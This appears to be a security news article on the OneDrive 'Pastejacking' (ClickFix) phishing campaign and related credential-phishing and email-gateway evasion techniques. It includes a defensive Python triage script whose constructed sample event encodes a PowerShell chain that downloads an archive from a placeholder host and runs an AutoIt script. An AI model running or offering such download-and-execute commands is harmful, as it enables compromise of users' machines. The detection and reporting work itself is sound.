New Phishing Scam Targets OneDrive Users with Malicious Script

Cybersecurity researchers are alerting the public about a new phishing campaign aimed at Microsoft OneDrive users, intending to execute a harmful PowerShell script.

“This campaign relies heavily on social engineering tactics to trick users into running a PowerShell script, which compromises their systems,” said a security researcher.

The cybersecurity firm is monitoring this clever phishing and downloader campaign under the name OneDrive Pastejacking.

The attack begins with an email containing an HTML file. When opened, the file displays an image mimicking a OneDrive page and shows an error message stating: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.”

The email presents two options: “How to fix” and “Details.” Clicking on “Details” takes the recipient to a legitimate Microsoft Learn page on Troubleshooting DNS. However, selecting “How to fix” guides the user through steps involving pressing “Windows Key + X” to open the Quick Link menu, launching the PowerShell terminal, and pasting a Base64-encoded command to supposedly resolve the issue.

“The command initially runs ipconfig /flushdns, creates a folder on the C: drive named ‘downloads,’ and then downloads an archive file to this location,” the researcher explained. “It renames the file, extracts its contents (‘script.a3x’ and ‘AutoIt3.exe’), and executes script.a3x using AutoIt3.exe.”
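The chain quoted above leaves a recognisable trace in process-creation telemetry: a PowerShell command line carrying a Base64 `-EncodedCommand` blob whose decoded UTF-16LE text combines a DNS flush, a `C:\downloads` folder, a web download and an AutoIt interpreter. The triage script below is an added example, not code from the researchers or any vendor; its indicator regexes, event format and sample events are constructed for illustration.

```python
import base64
import re
from typing import Optional

# Content indicators from the described chain (constructed regexes, not a vendor signature).
INDICATORS = {
    "flushdns": re.compile(r"ipconfig\s+/flushdns", re.I),
    "downloads_dir": re.compile(r"c:\\downloads\b", re.I),
    "web_download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|curl\s", re.I),
    "autoit": re.compile(r"autoit3\.exe|\.a3x\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand payload; PowerShell expects UTF-16LE inside the Base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: caller falls back to the raw command line


def triage_event(event: dict) -> dict:
    """Score one process-creation event; three or more indicators together is the ClickFix shape."""
    script = decode_encoded_command(event["cmdline"]) or event["cmdline"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    # A Win+X PowerShell window is parented by explorer.exe; weak alone, useful as context.
    if event.get("parent", "").lower() == "explorer.exe" and hits:
        hits.append("launched_from_explorer")
    return {"decoded": script, "hits": hits, "suspicious": len(hits) >= 3}


def _encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); the first mirrors the described chain.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": "powershell.exe -EncodedCommand " + _encode_ps(
        "ipconfig /flushdns; New-Item -ItemType Directory C:\\downloads; "
        "Invoke-WebRequest https://example.invalid/pkg.zip -OutFile C:\\downloads\\pkg.zip; "
        "C:\\downloads\\AutoIt3.exe C:\\downloads\\script.a3x")},
    {"parent": "explorer.exe", "cmdline": "powershell.exe -enc " + _encode_ps("Get-Date")},
    {"parent": "cmd.exe", "cmdline": "powershell.exe -Command ipconfig /flushdns"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = triage_event(ev)
        print(result["suspicious"], result["hits"])
```

A single flushed DNS cache or an explorer-parented PowerShell window is routine; the detection value lies in the combination, so alerts should fire on the bundle, not on any one indicator.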

This campaign has targeted users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.

The disclosure builds on similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks using this method, also known as ClickFix, are becoming more common.

This development follows the discovery of a new email-based social engineering campaign distributing fake Windows shortcut files that lead to the execution of malicious payloads hosted on Discord’s Content Delivery Network (CDN) infrastructure.

Phishing campaigns have also been increasingly observed sending emails with links to Microsoft Office Forms from previously compromised legitimate email accounts. These emails entice targets to divulge their Microsoft 365 login credentials under the guise of restoring their Outlook messages.

“Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within them,” the researcher said. “These forms are sent en masse via email, pretending to be legitimate requests such as password changes or access to important documents, mimicking trusted platforms like Adobe or Microsoft SharePoint.”

Moreover, other attacks have used invoice-themed lures to trick victims into sharing their credentials on phishing pages hosted on Cloudflare R2, which then exfiltrate the data to the threat actor via a Telegram bot.

It’s evident that adversaries are continuously finding new ways to stealthily bypass Secure Email Gateways (SEGs) to increase the success rate of their attacks.

According to a recent report, attackers are exploiting how SEGs scan ZIP archive attachments to deliver the Formbook information stealer using DBatLoader (also known as ModiLoader and NatsoLoader).

This method involves disguising the HTML payload as an MPEG file to evade detection. Many common archive extractors and SEGs parse the file header information but ignore the file footer, which might contain more accurate information about the file format.

To prevent falling victim to such phishing scams, always verify the authenticity of emails and websites before taking any action. Avoid clicking on links or downloading attachments from unknown sources. Use comprehensive security solutions that provide real-time phishing protection, and enable multi-factor authentication (MFA) on your accounts to add an extra layer of security.
